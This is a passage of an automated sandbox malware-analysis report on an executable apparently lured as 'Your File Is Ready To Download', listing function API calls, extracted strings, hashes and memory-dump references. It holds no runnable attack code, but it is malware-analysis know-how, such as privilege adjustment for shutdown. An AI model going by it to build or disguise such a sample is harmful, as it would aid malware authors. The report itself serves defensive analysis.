                                                                                                                                                                                                                          • malloc.LIBCMT ref: 00000001400A92DB
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$AllocateHeap_callnewhmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2243056865-0
                                                                                                                                                                                                                          • Opcode ID: 811574271ce87861843856c1ea9fe0638b73e87b6eecc9380bbad392b79faf63
                                                                                                                                                                                                                          • Instruction ID: 7bcdff37ff2d040582ae3e44b8d647126fe18db178480df19ca52cd0e18e52d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 811574271ce87861843856c1ea9fe0638b73e87b6eecc9380bbad392b79faf63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF0313370464486EF95CF6AE0C436D23A1E798BD8F189125EB5947399DB34C9D1CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 00000001400A8EB5
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A08: HeapFree.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A26
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A08: _errno.LIBCMT ref: 00000001400C9A30
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A08: GetLastError.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A38
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$Heapmalloc$AllocateErrorFreeLast_callnewh
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2348730211-0
                                                                                                                                                                                                                          • Opcode ID: fa57afaffd1429faa55b1bbb3f397dc7c40f0d153aa32acfc045764e4026fdc9
                                                                                                                                                                                                                          • Instruction ID: 5406d3715ada1e9d0876f599c61e5cc097bc4716b97439f30b038baf1b5791ad
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa57afaffd1429faa55b1bbb3f397dc7c40f0d153aa32acfc045764e4026fdc9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F01C31612B0085FB5F9B63A4553A521D0AB5CB84F080138EF890B3A2EF7C85E68750
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$MetricsWindow$System$CreateDestroyMoveObjectSelectTextmalloc
                                                                                                                                                                                                                          • String ID: Can't create control.$SysListView32
                                                                                                                                                                                                                          • API String ID: 2128158200-2372549606
                                                                                                                                                                                                                          • Opcode ID: 639b5495c808a4fce8a97204315c5b1709fca12f3f6e31ad2f8bfef02c9574ee
                                                                                                                                                                                                                          • Instruction ID: 8b187370ce9964201b21f946e87f45e34f3a21767b8e4785c225070cbf744bff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 639b5495c808a4fce8a97204315c5b1709fca12f3f6e31ad2f8bfef02c9574ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B16D32714B848AEB528B36D4507ED63A1FB8D7D4F148226EF4967BA5DF34D9828700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -+0 #$ULlTt$cCp$diouxX$eEfgGaA$s
                                                                                                                                                                                                                          • API String ID: 0-1162591181
                                                                                                                                                                                                                          • Opcode ID: b6c5557f7229d2c7d4b74eb8ea20577c320a1c8a5f8f6ada087f0fed3d3ff38e
                                                                                                                                                                                                                          • Instruction ID: 0cf9748cd74b6ec35057faa728611eb6d2a274f056a0b23b3f07d8b12a5df3cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c5557f7229d2c7d4b74eb8ea20577c320a1c8a5f8f6ada087f0fed3d3ff38e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0552B076615650C5EB7A9B9780543FA63A1FB8CBC4F848216FB8A476F5EB3CC891C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: <>=/|^,:*&~!()[]{}"$ <>=/|^,:*&~!()[]{}+-?$ <>=/|^,:*&~!()[]{}+-?.$ =$'\;`$A label must not point to an ELSE or UNTIL or CATCH.$Ambiguous or invalid use of "."$Missing close-quote$Not allowed as an output variable.$Out of memory.$Parse$Quote marks are required around this key.$The leftmost character above is illegal in an expression.$Too many var/func refs.$Unexpected %$_$#@
                                                                                                                                                                                                                          • API String ID: 0-249051751
                                                                                                                                                                                                                          • Opcode ID: 7f2bdcd844f6c38ed78b9e1ba22d3d82c2b0c9c922dd05cfe40de48d5db92c31
                                                                                                                                                                                                                          • Instruction ID: 2c3aff9e8129ae609a47a21db0db0698c57d35ec6241a12b15ce70f8e8505484
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f2bdcd844f6c38ed78b9e1ba22d3d82c2b0c9c922dd05cfe40de48d5db92c31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9C2CF7A60669181FBB69B17A1443FA62A5F75CBD4F84801AFF89476F5EB38CC91C300
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountForegroundTickWindow
                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                          • API String ID: 1022652907-2852464175
                                                                                                                                                                                                                          • Opcode ID: 1077d7dc5c41d1f738413a246805a62d7fa19dd16703351713b7a7d63bc786b8
                                                                                                                                                                                                                          • Instruction ID: bf32ce5787aa54775d81e5c24cda452f843a838051dfb3e04e3eafc4b4008841
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1077d7dc5c41d1f738413a246805a62d7fa19dd16703351713b7a7d63bc786b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7551B0722057808AFB66DF27E8043EA73A6FB8DB90F244515EB5947AB8DF78C445CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID: StrCmpLogicalW$shlwapi
                                                                                                                                                                                                                          • API String ID: 1746250041-63816878
                                                                                                                                                                                                                          • Opcode ID: d74a595051f439f92c47264d445b6b58406bb6a98fbc71c82d3528321b9a99a8
                                                                                                                                                                                                                          • Instruction ID: 85b5f7485b164ab87523c831e5341ee24094b5cacda06afb25474c354cf37385
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d74a595051f439f92c47264d445b6b58406bb6a98fbc71c82d3528321b9a99a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F819F726086D08AF762CF66E4447DF7BA5F788784F548116FB8947AA5CB7CC885CB00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongW.USER32 ref: 0000000140099050
                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 000000014009906F
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 0000000140099086
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8
                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 00000001400990A6
                                                                                                                                                                                                                          • _itow.LIBCMT ref: 0000000140099100
                                                                                                                                                                                                                          • _itow.LIBCMT ref: 00000001400991E4
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A10: HeapFree.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A26
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A10: _errno.LIBCMT ref: 00000001400C9A30
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A10: GetLastError.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A38
                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 0000000140099280
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend_errno$Heap_itow$AllocateErrorFreeLastLongWindow_callnewhmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4170425513-0
                                                                                                                                                                                                                          • Opcode ID: 9516f0d2888f96d3ff25729819a014950d18490cd65d6f40258261218e071b71
                                                                                                                                                                                                                          • Instruction ID: 16c26584fa8b2cdca4358e5b801beed3da81f9d8a5ccb165caa221a540f42e5e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9516f0d2888f96d3ff25729819a014950d18490cd65d6f40258261218e071b71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A291D23170569081FB669B6B95093EE26A0FB8DBE4F184625FF6A477F6DE38C4428300
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcsncpy
                                                                                                                                                                                                                          • String ID: <<>>$Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 322933527-651194365
                                                                                                                                                                                                                          • Opcode ID: 4024a9fd613815c53746b05d66fef0de2f21e117dfa886bf802c06163e5a0baf
                                                                                                                                                                                                                          • Instruction ID: 54342170228fe29567b6ab5d29182fb3be9c6e401a94da33a8bd56284c8f3106
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4024a9fd613815c53746b05d66fef0de2f21e117dfa886bf802c06163e5a0baf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF42CDB2604B8185FB6ACB27D4547E967A1F78CBD4F944126FB9A07BB5DB38C885C300
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _ui64tow$mallocwcsncpy
                                                                                                                                                                                                                          • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 1683598202-457448710
                                                                                                                                                                                                                          • Opcode ID: e178f51bce3ac928f138508a6f98b498b05e79369044f55f16dcffa2b7b6b023
                                                                                                                                                                                                                          • Instruction ID: 50dd1928b92c838915ddc26878011102f6f0bc6d5424618c5d31d1c2ae3cbf05
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e178f51bce3ac928f138508a6f98b498b05e79369044f55f16dcffa2b7b6b023
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4842CF32205A94C2EB66CB27E0147EA67A1FB8CBC4F544112FB9A47BF5EB3AD541C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                          • API String ID: 107509674-3733053543
                                                                                                                                                                                                                          • Opcode ID: ec9fb9d12d4dc4484accdbc553e33bd593cee51f5a49c5a3406da35a095f8b5e
                                                                                                                                                                                                                          • Instruction ID: f6aaa6cbccc93770738cf3e7b4ace6a3acd7a503507d81cfcc2f547cd21d43a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec9fb9d12d4dc4484accdbc553e33bd593cee51f5a49c5a3406da35a095f8b5e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6017171615B8182E7519B62B8483DE63E0FFCC795F408029B74A87674DF7CC59ACB10
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseFind$CreateErrorFirstHandleLastSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2200430037-0
                                                                                                                                                                                                                          • Opcode ID: 66f869ec7801c908e77214fa29eabad2038bc89d49a1086379cbf0956a0641a7
                                                                                                                                                                                                                          • Instruction ID: 30045df24ddf6c7d75368c9e012335c1e2eb4daeb347df2d5b9a6ad5a0ff1140
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f869ec7801c908e77214fa29eabad2038bc89d49a1086379cbf0956a0641a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F41BE3160478186FB629B27E8547EA63A6BB8DBE4F144620FF6D07BE5DB3CC4458710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
